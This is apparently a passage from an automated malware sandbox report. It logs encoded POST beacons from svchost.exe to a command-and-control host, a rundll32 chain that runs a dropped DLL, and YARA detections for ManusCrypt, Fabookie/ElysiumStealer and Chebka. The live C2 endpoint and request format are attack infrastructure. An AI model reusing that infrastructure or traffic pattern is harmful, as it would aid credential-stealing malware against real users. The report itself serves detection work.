                                                          2022-09-11 08:17:43 UTC629OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 63 71 4b 4c 58 72 61 4b 72 31 71 4b 6f 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 39 79 61 31 39 24 58 72 59 65 74 68 71 71 6f 68 74 65 48 68 39 66 58 71 49 65 61 6d 4e 62 66 72 64 65 59 6d 39 40 70 33 39 79 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 66 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 4d 70 71 43 6b 70 6d 69 66 6c 48 75 6d 33
                                                          Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbcqKLXraKr1qKoqaagpKZjZ3lsb2J7b3im3qSmq9ya19$XrYethqqohteHh9fXqIeamNbfrdeYm9@p39ymoKSmY2p7lqbepKbfot@moKSmlnt9b2Vipt6kpr6MpqCkpmiflHum3
                                                          2022-09-11 08:17:44 UTC630INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:17:44 GMT
                                                          Content-Type: application/json; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ny6WZiH%2BJwENc5P%2B94Y%2FhH2yCHfhlzGOo3Xd467%2BnZ0Ja6QySDkt18e8J%2FC1yOQ9MTX0VwXWaMALHbRSXx14aLc%2BrrCEcp05Wqt2BJRfGYK5kWqXevVt4aety5q9LzYi%2B5%2FAmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef7f70ba69229-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:17:44 UTC630INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                          Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                          2022-09-11 08:17:44 UTC630INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID:6
                                                          Source IP:192.168.2.3
                                                          Source Port:49758
                                                          Destination IP:104.21.34.132
                                                          Destination Port:443
                                                          Process:C:\Windows\System32\svchost.exe
                                                          Timestamp  kBytes transferred  Direction  Data
                                                          2022-09-11 08:17:44 UTC630OUTPOST /api4.php HTTP/1.1
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                          Host: pp.abcgameabc.com
                                                          Content-Length: 274
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2022-09-11 08:17:44 UTC631OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 63 71 4b 4c 58 72 61 4b 72 31 71 4b 6f 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 39 79 61 31 39 24 58 72 59 65 74 68 71 71 6f 68 74 65 48 68 39 66 58 71 49 65 61 6d 4e 62 66 72 64 65 59 6d 39 40 70 33 39 79 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 66 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 4d 70 71 43 6b 70 6d 69 66 6c 48 75 6d 33
                                                          Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbcqKLXraKr1qKoqaagpKZjZ3lsb2J7b3im3qSmq9ya19$XrYethqqohteHh9fXqIeamNbfrdeYm9@p39ymoKSmY2p7lqbepKbfot@moKSmlnt9b2Vipt6kpr6MpqCkpmiflHum3
                                                          2022-09-11 08:17:44 UTC631INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:17:44 GMT
                                                          Content-Type: application/json; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NJglRmnvOwqBdlLeq10ruAt0O64K0dX33UdoEyNq1FdNjnhD5cjM7IWNreMT%2BDLLyAOnBCMI7zF0QGDQ8htzjMi3Xq7z%2FggagRb7H2VOu%2BT%2F%2B2OoIoklGqsepGFXyfwb1KBC5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef7fb3eb1bc01-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:17:44 UTC631INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                          Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                          2022-09-11 08:17:44 UTC631INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID:7
                                                          Source IP:192.168.2.3
                                                          Source Port:49759
                                                          Destination IP:104.21.34.132
                                                          Destination Port:443
                                                          Process:C:\Windows\System32\svchost.exe
                                                          Timestamp  kBytes transferred  Direction  Data
                                                          2022-09-11 08:17:46 UTC631OUTPOST /api4.php HTTP/1.1
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                          Host: pp.abcgameabc.com
                                                          Content-Length: 1590
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2022-09-11 08:17:46 UTC632OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 73 5a 47 6d 68 70 5a 6c 62 57 6c 37 6c 71 62 65 70 4b 61 5a 62 4a 5a 6c 59 33 75 6d 6f 4b 53 6d 6d 57 56 6c 59 57 39 37 61 61 62 65 70 4b 61 50 6d 4a 76 54 68 34 79 4e 6c 34 69 4c 59 5a 35 75 61 58 6d 24 76 71 76 57 67 6f 65 24 33 47 4c 55 65 59 6a 66 71 32 35 76 62 6f 71 71 6a 64 53 66 61 34 4f 71 67 6d 32 61 33 49 32 4e 74 32 57 47 6c 70 68 35 68 36 4f 66 6e 4c 53 30 6d 57 35 74 6a 59 78 6f 69 6f 68 34 69 39 47 6b 70 71 43 6b 70 6d 78 6c 61 57 69 6d 33 71 53 6d 6f 6e 68 6c 61 32 5a 67 65 33 6c 67 62 33 6c 68 6f 6d 4a 37 61 4b 61 54 6f 4b 53 52 70 6f 61 57 5a
                                                          Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6ksZGmhpZlbWl7lqbepKaZbJZlY3umoKSmmWVlYW97aabepKaPmJvTh4yNl4iLYZ5uaXm$vqvWgoe$3GLUeYjfq25vboqqjdSfa4Oqgm2a3I2Nt2WGlph5h6OfnLS0mW5tjYxoioh4i9GkpqCkpmxlaWim3qSmonhla2Zge3lgb3lhomJ7aKaToKSRpoaWZ
                                                          2022-09-11 08:17:46 UTC633INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:17:46 GMT
                                                          Content-Type: application/json; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LNfaDO9g0Lv5aHCr6DVS%2Bk00kN27qipCSJ5pdkcgWmoeSI3%2Fo0IpMXA%2F%2BNAVK%2FPZQm%2BAkRSpWyG%2FtL%2FdtFt1zgV82yi%2BhpTdb76R5VF1vkxxQE9l1mquundMFPfsFXOn9Anw4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef8072be99131-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:17:46 UTC634INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                          Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                          2022-09-11 08:17:46 UTC634INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID:8
                                                          Source IP:192.168.2.3
                                                          Source Port:49760
                                                          Destination IP:104.21.34.132
                                                          Destination Port:443
                                                          Process:C:\Windows\System32\svchost.exe
                                                          Timestamp  kBytes transferred  Direction  Data
                                                          2022-09-11 08:17:46 UTC634OUTPOST /api4.php HTTP/1.1
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                          Host: pp.abcgameabc.com
                                                          Content-Length: 250
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2022-09-11 08:17:46 UTC634OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 66 31 39 65 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 5a 70 61 47 64 6f 65 36 62 65 70 4b 75 54 6f 4b 53 6d 62 35 53 6d 33 71 53 6d 33 4b 69 69 31 36 32 69 71 39 61 69 71 4b 6d 6d 6f 4b 53 6d 59 32 64 35 62 47 39 69 65 32 39 34 70 74 36 6b 70 71 76 63 6d 74 66 66 31 36 32 48 72 59 61 71 71 49 62 58 68 34 66 58 31 36 69 48 6d 70 6a 57 33 36 33 58 6d 4a 76 66 71 64 24 63 70 71 43 6b 70 6d 4e 71 65 35 61 6d 33 71 53 6d 33 36 4c 66 70 71 43 6b 70 70 5a 37 66 57 39 6c 59 71 62 65 70 4b 61 40 6a 4b 61 67 70 4b 5a 6f 6e 35 52 37 70 74 36 6b 71 36 43 6b 70 6d 70 37 6c 71 62 65 70 4b 6e 57 6b 77 3d 3d
                                                          Data Ascii: p=kaZ5bGdiYntgb3im3qTf19egpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaZpaGdoe6bepKuToKSmb5Sm3qSm3Kii162iq9aiqKmmoKSmY2d5bG9ie294pt6kpqvcmtff162HrYaqqIbXh4fX16iHmpjW363XmJvfqd$cpqCkpmNqe5am3qSm36LfpqCkppZ7fW9lYqbepKa@jKagpKZon5R7pt6kq6Ckpmp7lqbepKnWkw==
                                                          2022-09-11 08:17:47 UTC635INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:17:47 GMT
                                                          Content-Type: application/json; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QICfrLBtkpQjbvhu%2BKEvjNUE1zU%2BH%2BBGYDpQhIZfF9nYngUxPTPGPSAHkQhto3dGlWPHmpkmRO0tibCzXIiM6eloxbn4H4yVtolPgDDk%2FZya1yQqi7%2BTrcACXOCpxujKVfZaAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef80b7a28bbf2-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:17:47 UTC635INData Raw: 34 65 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 2c 22 63 6b 22 3a 5b 5d 2c 22 69 6e 73 63 6b 22 3a 5b 5d 7d 7d 0d 0a
                                                          Data Ascii: 4e{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1,"ck":[],"insck":[]}}
                                                          2022-09-11 08:17:47 UTC635INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID:9
                                                          Source IP:192.168.2.3
                                                          Source Port:49761
                                                          Destination IP:20.199.120.151
                                                          Destination Port:443
                                                          Process:C:\Windows\System32\svchost.exe
                                                          Timestamp  kBytes transferred  Direction  Data
                                                          2022-09-11 08:17:47 UTC635OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 64 35 62 37 33 35 61 35 33 33 62 32 66 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: 767d5b735a533b2f
                                                          2022-09-11 08:17:47 UTC635OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:17:47 UTC636OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 64 35 62 37 33 35 61 35 33 33 62 32 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: 767d5b735a533b2f<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:17:47 UTC637OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 64 35 62 37 33 35 61 35 33 33 62 32 66 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: 767d5b735a533b2f
                                                          2022-09-11 08:17:47 UTC637INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:17:47 UTC637INData Raw: 4d 53 2d 43 56 3a 20 41 30 54 78 6d 47 56 45 59 30 4f 58 57 6c 6a 62 61 4b 41 63 39 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: A0TxmGVEY0OXWljbaKAc9A.0Payload parsing failed.


                                                          Target ID:0
                                                          Start time:10:16:20
                                                          Start date:11/09/2022
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                          Imagebase:0x400000
                                                          File size:73728 bytes
                                                          MD5 hash:338057BA65F786F4238BE340D64DAF08
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          Target ID:1
                                                          Start time:10:16:21
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:2
                                                          Start time:10:16:22
                                                          Start date:11/09/2022
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\file.exe" -h
                                                          Imagebase:0x400000
                                                          File size:73728 bytes
                                                          MD5 hash:338057BA65F786F4238BE340D64DAF08
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          Target ID:3
                                                          Start time:10:16:22
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:4
                                                          Start time:10:16:27
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                                                          Imagebase:0x7ff76eb30000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:5
                                                          Start time:10:16:29
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                                                          Imagebase:0x1e0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Fabookie, Description: Detects Fabookie / ElysiumStealer, Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:high

                                                          Target ID:7
                                                          Start time:10:16:30
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:high

                                                          Target ID:9
                                                          Start time:10:16:31
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\svchost.exe -k WspService
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000003.317215501.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.798463056.00000244FC2B3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000009.00000002.813755349.00000244FF240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.813755349.00000244FF240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000003.309035814.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.807536432.00000244FE300000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
